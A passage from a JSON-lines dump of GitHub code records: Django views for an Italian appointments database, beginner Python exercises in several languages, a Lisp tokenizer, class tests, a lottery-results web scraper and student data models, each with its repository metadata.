get_context_data(self, **kwargs):\n\n now = datetime.now()\n self.base_template = self.template_name\n self.partecipate = Partecipata.objects.all().select_related().distinct()\n\n tipologia = self.request.GET.get('tipo',)\n if tipologia == 'amm_compenso':\n\n self.incarichi= Incarico.objects.all().\\\n filter(Q(data_inizio__lte=now) &\n (Q(data_fine__gte=now) | Q(data_fine__isnull=True))).\\\n values('persona', 'persona__nome', 'persona__cognome').\\\n annotate(s=Sum('compenso_totale')).filter(s__gte=100000).order_by('-s')\n\n elif tipologia =='amm_incarichi':\n self.incarichi = Incarico.objects.all().\\\n filter(Q(data_inizio__lte=now) &\n (Q(data_fine__gte=now) | Q(data_fine__isnull=True))).\\\n values('persona', 'persona__nome', 'persona__cognome').\\\n annotate(n=Count('persona')).filter(n__gt=2).order_by('-n')\n\n else:\n self.incarichi = Incarico.objects.all().\\\n filter(Q(data_inizio__lte=now) &\n (Q(data_fine__gte=now) | Q(data_fine__isnull=True)))\n\n self.context = super(NazioneView, self).get_context_data(**kwargs)\n self.context['n_partecipate'] = self.partecipate.count()\n return self.context\n\n\nclass EnteDetailView(PartecipateView, DetailView):\n model = Ente\n context_object_name = \"ente\"\n queryset = Ente.objects.all()\n base_template='nominati/ente_detail.html'\n\n def get_context_data(self, **kwargs):\n e = self.get_object()\n now = datetime.now()\n self.partecipate = Partecipata.objects.all().filter(ente__codice_fiscale=e.codice_fiscale).select_related().distinct()\n self.incarichi = Incarico.objects.filter(ente_nominante_cf=e.codice_fiscale).\\\n filter(Q(data_inizio__lte=now) &\n (Q(data_fine__gte=now) | Q(data_fine__isnull=True)))\n self.context = super(EnteDetailView, self).get_context_data(**kwargs)\n\n return self.context\n\n\nclass EnteListView(AccessControlView, ListView):\n model = Ente\n\n def get_context_data(self, **kwargs):\n context = super(EnteListView, self).get_context_data(**kwargs)\n context['SITE_URL'] = settings.SITE_URL\n return context\n\n def get_queryset(self):\n if 'qterm' in self.request.GET:\n qterm = self.request.GET['qterm']\n return Ente.objects.filter(denominazione__icontains=qterm)[0:50]\n else:\n return Ente.objects.all()[0:50]\n\n\nclass EnteJSONListView(JSONResponseMixin, EnteListView):\n def convert_context_to_json(self, context):\n return dumps(context['ente_list'])\n\n\n\nclass PartecipazioneListView(AccessControlView, ListView):\n model = Partecipazione\n\n def get_context_data(self, **kwargs):\n context = super(PartecipazioneListView, self).get_context_data(**kwargs)\n context['SITE_URL'] = settings.SITE_URL\n return context\n\n def get_queryset(self):\n if 'istat' in self.request.GET and 'anno' in self.request.GET:\n istat = self.request.GET['istat']\n anno = self.request.GET['anno']\n return Partecipazione.objects.\\\n filter(anno=anno, ente_cf__codice_istat=istat).\\\n values('partecipata_cf__codice_fiscale','partecipata_cf__denominazione','percentuale_partecipazione')\n\n\n\nclass PartecipazioneJSONListView(JSONResponseMixin, PartecipazioneListView):\n def convert_context_to_json(self, context):\n if 'partecipazione_list' in context and len(context['partecipazione_list'])>0:\n return dumps(context['partecipazione_list'])\n\n\nclass MergePersona_OP(View):\n\n def post(self, *args, **kwargs):\n #set the attrib openpolis_id for the selected persona\n if self.request.POST is not None:\n post = self.request.POST\n persona_id = post['persona_id']\n birth_location = post['birth_location']\n birth_date = post['birth_date']\n\n p = Persona.objects.get(pk=persona_id)\n #scrive op_id, data e luogo di nascita se facciamo il merge\n p.openpolis_id = post['openpolis_id']\n p.luogo_nascita = post['birth_location']\n p.data_nascita = post['birth_date']\n\n p.save()\n return redirect(post['return_page'])\n\n\nclass RemovePersona_OP(View):\n\n def post(self, *args, **kwargs):\n #remove the attrib openpolis_id for the selected persona\n if self.request.POST is not None:\n post = self.request.POST\n persona_id = post['persona_id']\n p = Persona.objects.get(pk=persona_id)\n #rimuove op_id, data e luogo di nascita se rimuoviamo la similarita'\n p.openpolis_id = None\n p.data_nascita = None\n p.luogo_nascita = None\n p.save()\n return redirect(post['return_page'])\n\n\nclass NominatiHome(AccessControlView, TemplateView):\n\n template_name = \"nominati/home.html\"\n def get_context_data(self, **kwargs):\n if self.request.user.is_authenticated():\n return render_to_response('nominati/home.html')\n else:\n return redirect('login/?next=/')\n\n\ndef check_similars_views(request, object_id):\n if not (request.user.is_authenticated() and request.user.is_staff):\n return HttpResponseNotFound('

Page not found

')\n \n obj = Persona.objects.get(pk=object_id)\n \n url = \"http://api.openpolis.it/op/1.0/similar_politicians/\"\n url += \"?first_name=%s&last_name=%s\" % (obj.nome, obj.cognome)\n #, content_type='application/json; charset=utf-8'\n return HttpResponse(json.dumps(get_json_response(url), indent=4), mimetype=\"application/json\")\n \n \ndef get_json_response(url):\n \"\"\"\n generic method to get json response from url,\n using basic authentication\n \"\"\"\n username = settings.OP_API_USER\n password = settings.OP_API_PASS\n\n # this creates a password manager\n passman = urllib2.HTTPPasswordMgrWithDefaultRealm()\n passman.add_password(None, url, username, password)\n # because we have put None at the start it will always\n # use this username/password combination for urls\n # for which `theurl` is a super-url\n\n authhandler = urllib2.HTTPBasicAuthHandler(passman)\n # create the AuthHandler\n\n opener = urllib2.build_opener(authhandler)\n urllib2.install_opener(opener)\n # All calls to urllib2.urlopen will now use our handler\n # Make sure not to include the protocol in with the URL, or\n # HTTPPasswordMgrWithDefaultRealm will be very confused.\n # You must (of course) use it when fetching the page though.\n\n response = urllib2.urlopen(url)\n return json.loads(response.read())\n\n\n","repo_name":"openpolis/op_nominati","sub_path":"nominati/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70509215771","text":"import random\n\nclass KlasaPostaci:\n def __init__(self, Rasa, Imie, Nazwisko, Wiek, Wzrost, Moc, Broń, Pancerz): #dane postaci\n\n self.Rasa = Rasa #str\n self.Imie = Imie #str\n self.Nazwisko = Nazwisko #str\n self.Wiek = Wiek #int\n self.Wzrost = Wzrost #int\n self.Moc = Moc #str\n self.Broń = Broń #str\n self.Pancerz = Pancerz #str\n\n def Void(self):\n print(\"SELF\")\n\n def GenerowaniePostaci(self):\n ### RASA\n self.Rasa = input(\"Podaj wartosc_float: \") or \"Losowe\"\n if self.Rasa == \"Losowe\":\n self.Rasa = random.choice(ListaRas)\n print(\"Wylosowane wartosc_float to \" + self.Rasa)\n else:\n print(\"Wpisane wartosc_string to \" + self.Rasa)\n \nPostać = KlasaPostaci(\"\",\"\",\"\",0,0,\"\",\"\",\"\")\nPostać.Void()\n","repo_name":"BlyatTukan/ADIM","sub_path":"Piotrek/Zadanie1.py","file_name":"Zadanie1.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5013789560","text":"\"\"\"\nУрок 3. Данные, функции и модули в Python\n\n1- Задайте список из нескольких чисел. Напишите программу, которая найдёт\n сумму элементов списка, стоящих на нечётной позиции.\n\nПример:\n[2, 3, 5, 9, 3] -> на нечётных позициях элементы 3 и 9, ответ: 12\n\n\"\"\"\n\nmy_nums = [2, 3, 5, 9, 3]\n'''\nРешение 1. С помощью функции sum_elements нахождения \nсуммы элементов на нечетной позиции\n'''\n\n\ndef sum_elements(my_nums):\n sum = 0\n for i in range(len(my_nums)):\n if i % 2 != 0:\n sum += my_nums[i]\n return sum\n\n\nprint(\n f'Сумма элементов списка - [2, 3, 5, 9, 3], стоящих на нечётной позиции ='\n f' {sum_elements(my_nums)}')\n\n\n'''\nРешение 2. С помощью встроенных функций Python\n'''\nmy_nums = [4, 6, 8, 3, 12, 5, 3, 7, 10]\n\nprint(\n f'Сумма элементов списка - [4, 6, 8, 3, 12, 5, 3, 7, 10], стоящих на нечётной позиции ='\n f' {sum([my_nums[i] for i in range(len(my_nums)) if i % 2 != 0])}')\n\n","repo_name":"GrafanyS/pythonSeminar","sub_path":"SeminarLesson3/Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36930079950","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 29 20:42:58 2018\n\n@author: Francisco\n\"\"\"\n\nfrom scipy.fftpack import fft\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport pdsmodulos.generador as gen\nimport numpy as np\nimport pdsmodulos.tools as tools\n\ndef testbench():\n \n fs = 1000\n N = 1000\n \n a0 = 1\n f0 = 10\n \n tiempo, señal1 = gen.generador_senoidal(fs, f0, N, a0)\n tools.spectrum_analyzer(señal1, fs, N)\n \n tiempo, señal2 = gen.generador_ruido(fs, N, mean = 0, variance = 5)\n tools.spectrum_analyzer(señal2, fs, N)\n \n tiempo, señal3 = gen.generador_ruido(fs, N, distribution = 'Uniform', high = 2, low = -2)\n tools.spectrum_analyzer(señal3, fs, N)\n \n tiempo, señal4 = gen.generador_ruido(fs, N, distribution = 'Triangular')\n tools.spectrum_analyzer(señal4, fs, N)\n \n plt.figure()\n plt.subplot(4,1,1)\n plt.hist(señal1, bins=10) # arguments are passed to np.histogram\n plt.subplot(4,1,2)\n plt.hist(señal2, bins=10) # arguments are passed to np.histogram\n plt.subplot(4,1,3)\n plt.hist(señal3, bins=10) # arguments are passed to np.histogram\n plt.subplot(4,1,4)\n plt.hist(señal4, bins=10) # arguments are passed to np.histogram\n \n\ntestbench()\n\n","repo_name":"franmaiocchi/DSP","sub_path":"Clases/Analizador.py","file_name":"Analizador.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43286262120","text":"class Token:\n def __init__(self, token_type, val=None):\n self.token_type = token_type\n self.val = val\n \n def __str__(self):\n return f'{self.token_type}:{self.val}'\n \n def __eq__(self, other):\n if isinstance(other, Token):\n return self.token_type == other.token_type and self.val == other.val\n return False\n\ndef preprocess_string_expression(exp):\n \"\"\"Clean the expression\"\"\"\n # remove line comments\n exp = [line for line in exp.split('\\n') if len(line)>0 and line[0] != ';']\n exp = ' '.join(exp)\n exp = exp.replace('\\n', ' ')\n \n # reduce multiple spaces to one\n while exp.find(' ')>0:\n exp = exp.replace(' ', ' ')\n\n return exp\n\ndef tokenize(exp):\n exp = preprocess_string_expression(exp)\n\n tokens = []\n w = ''\n list_open = False\n string_open = False\n \n def add_word():\n nonlocal w\n if w != '':\n tokens.append(Token('word', w))\n w = ''\n \n index = 0\n while index < len(exp): \n k = exp[index]\n if k == '(':\n tokens.append(Token('open'))\n \n elif k == ')':\n add_word()\n tokens.append(Token('list_close' if list_open else 'close'))\n list_open = False\n \n elif k == ' ' and string_open == False:\n add_word()\n\n elif k == \"'\": # list starter\n if exp[index+1] == '(':\n list_open = True\n tokens.append(Token('list_open'))\n index += 1\n\n elif k == '\"':\n if string_open: # close string\n tokens.append(Token('word', w))\n w = ''\n string_open = False\n else:\n string_open = True\n\n else:\n w = w + k\n\n index += 1\n \n return tokens","repo_name":"yortuc/lispip","sub_path":"tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"19612656099","text":"#!/usr/bin/env python3\n# pylint: disable=all\n'''\nChapter 9 Tests\n'''\n\nimport ch9\n\n\ndef test_create_scoops():\n '''\n test ch9.create_scoops()\n '''\n expected = '[Scoop(chocolate), Scoop(vanilla), Scoop(rocky road)]'\n got = ch9.create_scoops()\n assert str(got) == expected, f'{got} != {expected}'\n for i, flavor in enumerate(['chocolate', 'vanilla', 'rocky road']):\n assert got[i].flavor == flavor, f'{got[i].flavor} != {flavor}'\n\n\ndef test_Bowl_add_scoops_basic():\n '''\n test ch9.Bowl.add_scoops() basic usage\n '''\n expected = 'Scoop(vanilla),Scoop(chocolate),Scoop(avacado)'\n s1 = ch9.Scoop('vanilla')\n s2 = ch9.Scoop('chocolate')\n s3 = ch9.Scoop('avacado')\n b = ch9.Bowl()\n b.add_scoops(s1, s2)\n b.add_scoops(s3)\n got = b\n assert str(got) == expected, f'{got} != {expected}'\n for i, flavor in enumerate(['vanilla', 'chocolate', 'avacado']):\n assert got.scoops[i].flavor == flavor, f'{got.scoops[i].flavor} != {flavor}'\n\n\ndef test_Bowl_add_scoops_max():\n '''\n test ch9.Bowl.add_scoops() max limit\n '''\n expected = 'Scoop(rocky road),Scoop(cookies and cream),Scoop(vanilla)'\n s1 = ch9.Scoop('rocky road')\n s2 = ch9.Scoop('cookies and cream')\n s3 = ch9.Scoop('vanilla')\n s4 = ch9.Scoop('chocolate')\n s5 = ch9.Scoop('avacado')\n b = ch9.Bowl()\n b.add_scoops(s1, s2)\n b.add_scoops(s3, s4)\n b.add_scoops(s5)\n got = b\n assert str(got) == expected, f'{got} != {expected}'\n assert len(got.scoops) == 3, f'len should be 3'\n for i, flavor in enumerate(['rocky road', 'cookies and cream', 'vanilla']):\n assert got.scoops[i].flavor == flavor, f'{fot.scoops[i].flavor} != {flavor}'\n\n\ndef test_BigBowl_add_scoops_max():\n '''\n test ch9.Bowl.add_scoops() max limit\n '''\n expected = 'Scoop(cookies and cream),Scoop(rocky road),Scoop(cookie dough),Scoop(chocolate),Scoop(vanilla)'\n s1 = ch9.Scoop('cookies and cream')\n s2 = ch9.Scoop('rocky road')\n s3 = ch9.Scoop('cookie dough')\n s4 = ch9.Scoop('chocolate')\n s5 = ch9.Scoop('vanilla')\n s6 = ch9.Scoop('avacado')\n b = ch9.BigBowl()\n b.add_scoops(s1, s2)\n b.add_scoops(s3, s4)\n b.add_scoops(s5, s6)\n got = b\n assert str(got) == expected, f'{got} != {expected}'\n assert len(got.scoops) == 5, f'len should be 5'\n for i, flavor in enumerate([\n 'cookies and cream',\n 'rocky road',\n 'cookie dough',\n 'chocolate',\n 'vanilla',\n ]):\n assert got.scoops[i].flavor == flavor, f'{got[i].scoops.flavor} != {flavor}'\n\n\ndef test_FlexibleDict():\n '''\n test ch9.FlexibleDict()\n '''\n\n # test string as key\n fda = ch9.FlexibleDict()\n fda['a'] = 300\n assert fda['a'] == 300, f\"fda['a'] should be 300\"\n\n # test int as key\n fdb = ch9.FlexibleDict()\n fdb[5] = 500\n assert fdb[5] == 500, f'fdb[5] should be 500'\n\n # test int as key with string as accessor\n fdc = ch9.FlexibleDict()\n fdc[1] = 100\n assert fdc['1'] == 100, f\"fdc['1'] should be 100\"\n\n # test string as key with int as accessor\n fdd = ch9.FlexibleDict()\n fdd['1'] = 200\n assert fdd[1] == 200, f'fdd[1] should be 200'\n\n # test non-existent key\n fde = ch9.FlexibleDict()\n assert fde['nothing'] == None, f\"fde['nothing'] should be None\"\n","repo_name":"kylerisse/python-workout","sub_path":"src/ch9_test.py","file_name":"ch9_test.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"29997554427","text":"\ndef sum_digits(a, b):\n s=0\n for i in range (a,b+1):\n l=len(str(i))\n n=i;\n for j in range(l):\n s+=n%(10)\n n=int(n/10)\n return s\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"kmruefq3dhdqxtLeM_12.py","file_name":"kmruefq3dhdqxtLeM_12.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11588566505","text":"import sys\nn=int(raw_input())\na=0\ng=0\nwhile(n>0):\n r=raw_input().split()\n r[0]=int(r[0])\n r[1]=int(r[1])\n if(g+r[0]-a<=500):\n g+=r[0]\n sys.stdout.write(\"A\")\n else:\n a+=r[1]\n sys.stdout.write(\"G\")\n n-=1\n","repo_name":"swapnil085/CP-Codeforces","sub_path":"282b.py","file_name":"282b.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8599137049","text":"#------------------------------\n# FUNCTION\n#------------------------------\n\n# function Non parameter\ndef halo_dunia():\n var = \"Halo Python, Halo dunia...\"\n print(var)\n\nhalo_dunia()\n\nprint('')\n\n# function parameter\ndef selamat_datang(nama):\n var = f'Halo {nama}, welcome!'\n print(var)\n\nselamat_datang('rijal')\n\ndef selamat_datang(nama, dari):\n var = f'Halo {nama}, dari {dari}!'\n print(var)\n\nselamat_datang('rijal', 'jakarta')\nselamat_datang(dari='jogja', nama='budi')\n\ndef selamat_datang(*daftar_nama):\n var = 'Halo '\n for nama in daftar_nama:\n var += nama + ', '\n \n var += 'Welcome'\n print(var)\n\nselamat_datang('satu', 'dua', 'tiga')\n\nprint('')\n\n# function Anonim\ndouble = lambda x : x * 2\n\nprint(double(5))\n\nprint('')\n\n# Bonus = Docstring\ndef selamat_datang(nama):\n '''\n Ini adalah function untuk menyapa\n nama yang telah ada pada parameter\n '''\n var = f'Halo {nama}, welcome!'\n print(var)\n\nselamat_datang('rijal')\nprint(selamat_datang.__doc__) # mencetak string comment\n\n# Bonus Scope & Return\na = 2\nb = 1\nx = 100\n\ndef operasi(a, b, c=1): # nilai c diberikan secara default jika pada pemanggilan fungsi tidak di cantumkan.\n op1 = a + b\n op2 = op1 // c\n\n print('a di dalam function:', a) # nilai scope di dalam function\n print('b di dalam function:', b)\n\n print(x)\n\n return op2 # memberikan nilai balik\n\nhasil = operasi(a=10, b=5, c=3)\nprint(hasil)\n\nprint('a di luar function:', a) # nilai scope di luar function\nprint('b di luar function:', b)\n\nprint('')\n\n# Exercise\n# Buatlah fungsi yang akan mengevaluasi apakah modulus dari hasil kali 2 angka yang diterima bernilai 0 atau tidak\n# Gunakan statement return untuk mengembalikan nilai tersebut lalu cetak hasilnya\n# Beri nama cek_modulus() pada fungsi tersebut\nprint('Exercise')\n\nangka1 = 12\nangka2 = 8\n\ndef cek_modulus(a, b):\n a *= 2\n b *= 2\n y = a % b\n\n return y\n\nhasil = cek_modulus(12, 8)\nprint('Modulus dari 12 dan 8 adalah = ', hasil)\n","repo_name":"rij4l-it/Indonesia-AI-Python-Programming-Course","sub_path":"lat_6.py","file_name":"lat_6.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38101061160","text":"from urllib.request import Request, urlopen\nimport logging\nimport requests\n\nfrom bs4 import BeautifulSoup\n\nlogger = logging.getLogger(__name__)\n\nTIMEOUT = 20\n\n\ndef get_result_from_google_search() -> list:\n \"\"\"\n Função para realizar o Webscrapping no Google, formatar os dados em uma lista de inteiros e\n retornar.\n\n :return: [ int ]\n \"\"\"\n result_list = []\n\n try:\n url = 'https://www.google.com/search?q=caixa+mega+sena'\n\n request = Request(url)\n\n request.add_header('User-Agent',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36')\n\n raw_response = urlopen(request, timeout=TIMEOUT).read()\n\n html = raw_response.decode(\"utf-8\")\n soup = BeautifulSoup(html, 'html.parser')\n\n data = soup.findAll(\"span\", attrs={\"class\": \"zSMazd\"})\n\n if data:\n result_list = [int(span.text) for span in data]\n logger.warning(f\"Webscrapping Google Result - {result_list}\")\n\n except Exception as ex:\n logger.error(f\"ERROR Webscraping Google - {str(ex)}\")\n\n return result_list\n\n\ndef get_result_from_cef() -> list:\n \"\"\"\n Função para realizar o Webscrapping na Caixa Econômica Federal, formatar os dados em uma lista de inteiros e\n retornar.\n\n :return: [ int ]\n \"\"\"\n\n result_list = []\n\n try:\n url = \"http://www.loterias.caixa.gov.br/wps/portal/loterias\"\n\n html = requests.get(url, timeout=TIMEOUT).content\n soup = BeautifulSoup(html, 'html.parser')\n\n data = soup.find(\"ul\", attrs={\"class\": \"resultado-loteria mega-sena\"})\n\n if data:\n result_list = [int(li.text) for li in data.findAll(\"li\")]\n\n logger.warning(f\"Webscrapping CEF Result - {result_list}\")\n except Exception as ex:\n logger.error(f\"ERROR Webscraping CEF - {str(ex)}\")\n\n return result_list\n\n\ndef get_lottery_result() -> list:\n \"\"\"\n Função core para realizar a consulta dos resultado da mega sena, tentando fazer o webscrapping no Google ou na\n Caixa Econômica Federal.\n\n :return: [ int ]\n \"\"\"\n\n response = get_result_from_google_search() or get_result_from_cef()\n if not response:\n raise Exception(\"It was not possible to get the result of the mega sena\")\n return response\n","repo_name":"caiomagri/teste-python-backend","sub_path":"api/core/apps/lottery/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12887459823","text":"from collections import defaultdict\n\n\ndef get_activity(taken, approved, accumulated, semester):\n # LISTO\n percentage = accumulated * 100 / 16\n if accumulated == 16:\n if taken == 0:\n return None\n else:\n return \"Qualified ({}). 16/16\".format(semester)\n # NO TOMÓ CURSOS\n elif taken == 0:\n return \"No requirements taken ({}). {}/16\".format(semester, accumulated)\n # TOMÓ CURSOS Y PROGRESÓ\n elif taken > 0 and approved > 0:\n return \"Approved Reqs ({}). {}/16\".format(semester, accumulated)\n # TOMÓ CURSOS Y NO PROGRESÓ\n elif taken > 0 and approved == 0:\n return \"No approved Reqs. ({}). {}/16\".format(semester, accumulated)\n\n\ndef timestamp_before(date, days):\n parsed = date.split(\"/\")\n year = int(parsed[0])\n month = int(parsed[1])\n day = int(parsed[2])\n return \"{:04d}/{:02d}/{:02d}\".format(year, month, day - days)\n\n\ndef timestamp_after(date, days):\n parsed = date.split(\"/\")\n year = int(parsed[0])\n month = int(parsed[1])\n day = int(parsed[2])\n return \"{:04d}/{:02d}/{:02d}\".format(year, month, day + days)\n\n\nclass Student:\n\n all = {}\n\n def __init__(self, data):\n self.__dict__ = data\n self.student_id = \"{}{}\".format(\n data['student_number'], data['admission_year'])\n Student.all.update({self.student_id: self})\n self.courses = defaultdict(list)\n self.semesters = defaultdict(list)\n self.semester_count = 3 * (2018 - int(data['admission_year']))\n self.requirements_ready = False\n self.requirements_ready_at = \"\"\n\n @classmethod\n def filter_by(cls, field, value):\n return {k: v for k, v in cls.all.items() if getattr(v, field) == value}\n\n def progress_per_semester(self):\n progresses = {}\n accumulated = 0\n for semester_number in range(1, self.semester_count + 1):\n semester = int(semester_number)\n start_timestamp, end_timestamp = Course.timestamp_from_relative(\n semester, self.admission_year)\n if semester in self.semesters.keys():\n courses = self.semesters[semester]\n taken = len(courses)\n approved = len([c for c in courses if float(\n c.final_grade) >= 4.0 or c.alpha_final_grade == \"A\"])\n else:\n courses = []\n taken = 0\n approved = 0\n failed = taken - approved\n accumulated += approved\n percentage = accumulated * 100 / 16\n if accumulated == 16:\n self.requirements_ready = True\n self.requirements_ready_at = semester_number\n semester_name = \"{}º SEM\".format(semester_number - int(semester_number / 3))\n if semester_number % 3 == 0:\n semester_name = \"{}º TAV\".format(int(semester_number / 3))\n progresses.update(\n {semester: {\n \"semester\": semester,\n \"semester_name\": semester_name,\n \"percentage\": percentage,\n \"approved\": approved,\n \"failed\": failed,\n \"taken\": taken,\n \"accumulated\": accumulated,\n \"total\": 16,\n \"semester_start\": start_timestamp,\n \"semester_end\": end_timestamp,\n \"start_timestamp\": timestamp_after(end_timestamp, 3),\n \"end_timestamp\": timestamp_after(end_timestamp, 4),\n \"activity\": get_activity(taken, approved, accumulated, semester_name)\n }})\n return progresses\n\n\nclass Course:\n\n all = {}\n\n # format month/day\n timestamps = {\n 1: {\n \"start_date\": \"03/05\",\n \"end_date\": \"07/04\",\n },\n 2: {\n \"start_date\": \"08/04\",\n \"end_date\": \"12/15\",\n },\n 3: {\n \"start_date\": \"01/04\",\n \"end_date\": \"02/22\",\n }\n }\n\n def __init__(self, data):\n self.__dict__ = data\n self.course_id = \"{}{}{}\".format(\n data['rut'], data['initials'], data['semester'])\n self.case_id = ['student_number']\n self.student_id = \"{}{}\".format(\n data['student_number'], data['admission_year'])\n self.start_timestamp, self.end_timestamp = Course.timestamp_from_absolute(\n data['semester'], data['year'])\n self.grade = data['final_grade'] if data['final_grade'] != \"nan\" else data['alpha_final_grade']\n\n Course.all.update({self.course_id: self})\n\n @classmethod\n def filter_by(cls, field, value):\n return {k: v for k, v in cls.all.items() if getattr(v, field) == value}\n\n @classmethod\n def timestamp_from_relative(cls, relative_semester, admission_year):\n relative_semester = int(relative_semester)\n semester = 3 if relative_semester % 3 == 0 else relative_semester % 3\n start = cls.timestamps[semester]['start_date']\n end = cls.timestamps[semester]['end_date']\n year = int(admission_year) + int(relative_semester / 3)\n return [\"{}/{}\".format(year, start), \"{}/{}\".format(year, end)]\n\n @classmethod\n def timestamp_from_absolute(cls, absolute_semester, year):\n semester = int(absolute_semester)\n start = cls.timestamps[semester]['start_date']\n end = cls.timestamps[semester]['end_date']\n year = int(year) + int(semester / 3)\n return [\"{}/{}\".format(year, start), \"{}/{}\".format(year, end)]\n\n @classmethod\n def with_initials(cls, initials):\n return {k: v for k, v in cls.all.items() if v.initials in initials}\n\n @classmethod\n def from_students(cls, students):\n return {k: v for k, v in cls.all.items() if v.student_id in students}\n\n def __repr__(self):\n return \"{}-{} {}-{}: {} ({})\".format(self.year, self.semester, self.initials, self.section, self.course_name, self.grade)\n\n def relative_semester(self):\n relative_year = int(self.year) - int(self.admission_year)\n semester = relative_year * 3 + int(self.semester)\n return int(semester)\n\n\nclass Requirement:\n\n all = {}\n\n def __init__(self, **data):\n self.initials = data['initials']\n self.valid_initials = data['valid_initials'] + [self.initials]\n self.name = data['name']\n self.semester = data['semester']\n\n if self.valid_initials:\n for initial in self.valid_initials:\n Requirement.all.update({initial: self})\n\n\n# class ProgressActivity:\n\n # JUST TO DUMP DATA!\n\n\nclass StudentRaw:\n all = []\n\n prop_names = {\n 'RUT': 'rut',\n 'N°ALUMNO': 'student_number',\n 'CURRICULUM': 'curriculum',\n 'CODIGO PROGRAMA': 'program_code',\n 'PROGRAMA': 'program',\n 'CODIGO PREFERENCIA ESPECIALIDAD': 'specialty_preference_code',\n 'PREFERENCIA ESPECIALIDAD': 'specialty_preference',\n 'CODIGO PREFERENCIA MAJOR': 'major_preference_code',\n 'PREFERENCIA MAJOR': 'major_preference',\n 'CODIGO MAJOR SELECCIONADO': 'selected_major_code',\n 'MAJOR SELECCIONADO': 'selected_major',\n 'CODIGO MINOR SELECCIONADO': 'selected_minor_code',\n 'MINOR SELECCIONADO': 'selected_minor',\n 'TRACK/ÁREA': 'track',\n 'PLAN DE ESTUDIOS PERSONALIZADO': 'customized_studies_plan',\n 'ESTADO': 'state',\n 'AÑO INGRESO': 'admission_year',\n 'VÍA DE INGRESO': 'admission_way',\n 'TIPO INGRESO ESPECIAL': 'special_admission_type',\n 'PROM. PPA': 'ppa',\n 'TOTAL CRÉDITOS APROBADOS': 'total_approved_credits',\n 'TOTAL CRÉDITOS CONVALIDADOS': 'total_validated_credits',\n 'TOTAL CRÉDITOS APROBADOS+CONVALIDADOS': 'total_approved_and_validated_credits',\n 'TOTAL CRÉDITOS REPROBADOS': 'total_failed_credits',\n 'TOTAL CRÉDITOS INSCRITOS': 'total_enrolled_credits',\n 'N° CAUSALES ELIMINACIÓN (POR SEMESTRE)': 'elimination_causals_number',\n 'ESTUDIOS VIGENTES(PARALELO)': 'valid_studies',\n 'ESTUDIOS NO VIGENTES(FINALIZADOS POR ALGÚN MOTIVO)': 'invalid_studies',\n 'LICENCIADO': 'licensed',\n 'FECHA LIC.': 'licensed_at',\n 'EGRESADO': 'graduated',\n 'FECHA EGR.': 'graduated_at',\n 'TITULADO': 'tituled',\n 'COLEGIO REGIÓN': 'school_region',\n 'COLEGIO TIPO': 'school_type',\n 'COLEGIO EGRESO': 'school_of_graduation',\n 'ESTADO DSRD ACTUAL': 'dsrd_current_state',\n 'TIPO INGRESO': 'admission_type',\n 'PUESTO': 'admission_ranking',\n }\n\n def __init__(self, **kwargs):\n self.rut = str(kwargs.get('RUT', ''))\n self.student_number = str(kwargs.get('N°ALUMNO', ''))\n self.curriculum = str(kwargs.get('CURRICULUM', ''))\n self.program_code = str(kwargs.get('CODIGO PROGRAMA', ''))\n self.program = str(kwargs.get('PROGRAMA', ''))\n self.specialty_preference_code = str(kwargs.get(\n 'CODIGO PREFERENCIA ESPECIALIDAD', ''))\n self.specialty_preference = str(kwargs.get(\n 'PREFERENCIA ESPECIALIDAD', ''))\n self.major_preference_code = str(kwargs.get(\n 'CODIGO PREFERENCIA MAJOR', ''))\n self.major_preference = str(kwargs.get('PREFERENCIA MAJOR', ''))\n self.selected_major_code = str(kwargs.get(\n 'CODIGO MAJOR SELECCIONADO', ''))\n self.selected_major = str(kwargs.get('MAJOR SELECCIONADO', ''))\n self.selected_minor_code = str(kwargs.get(\n 'CODIGO MINOR SELECCIONADO', ''))\n self.selected_minor = str(kwargs.get('MINOR SELECCIONADO', ''))\n self.track = str(kwargs.get('TRACK/ÁREA', ''))\n self.customized_studies_plan = str(kwargs.get(\n 'PLAN DE ESTUDIOS PERSONALIZADO', ''))\n self.state = str(kwargs.get('ESTADO', ''))\n self.admission_year = str(kwargs.get('AÑO INGRESO', ''))\n self.admission_way = str(kwargs.get('VÍA DE INGRESO', ''))\n self.special_admission_type = str(\n kwargs.get('TIPO INGRESO ESPECIAL', ''))\n self.ppa = str(kwargs.get('PROM. PPA', ''))\n self.total_approved_credits = str(kwargs.get(\n 'TOTAL CRÉDITOS APROBADOS', ''))\n self.total_validated_credits = str(kwargs.get(\n 'TOTAL CRÉDITOS CONVALIDADOS', ''))\n self.total_approved_and_validated_credits = str(kwargs.get(\n 'TOTAL CRÉDITOS APROBADOS+CONVALIDADOS', ''))\n self.total_failed_credits = str(kwargs.get(\n 'TOTAL CRÉDITOS REPROBADOS', ''))\n 